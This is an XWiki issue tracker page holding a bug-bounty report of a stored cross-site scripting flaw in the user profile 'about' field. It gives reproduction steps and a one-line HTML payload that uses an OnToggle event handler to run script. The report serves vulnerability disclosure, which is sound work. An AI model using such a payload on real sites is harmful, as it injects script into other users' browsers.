Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20348

SXSS via source in text area

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      SUBMISSION REFERENCES

      RESEARCHER INFORMATION

      • Submitter: ynoof

      SUBMISSION INFORMATION

      • Created at: Fri, 04 Nov 2022 14:36:49 GMT
      • Submission status: Archived

      REPORT CONTENT

      Stored XSS at user profile via `about` text area.

          1. Steps to reproduce
            1. Go to user profile
            2. Add the following payload in the `about` text area.

      ```
      html
      '"<!--><Details Open OnToggle=confirm("Ynoof/Was/Here")>
      /html
      ```

      Click on source before saving.

          1. POC {186066}

      Thanks,
      Ynoof

      Attachments

        1. 186066_poc.png
          70 kB
          Intigriti Integration

        Issue Links

          Activity

            People

              MichaelHamann Michael Hamann
              intigriti Intigriti Integration
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: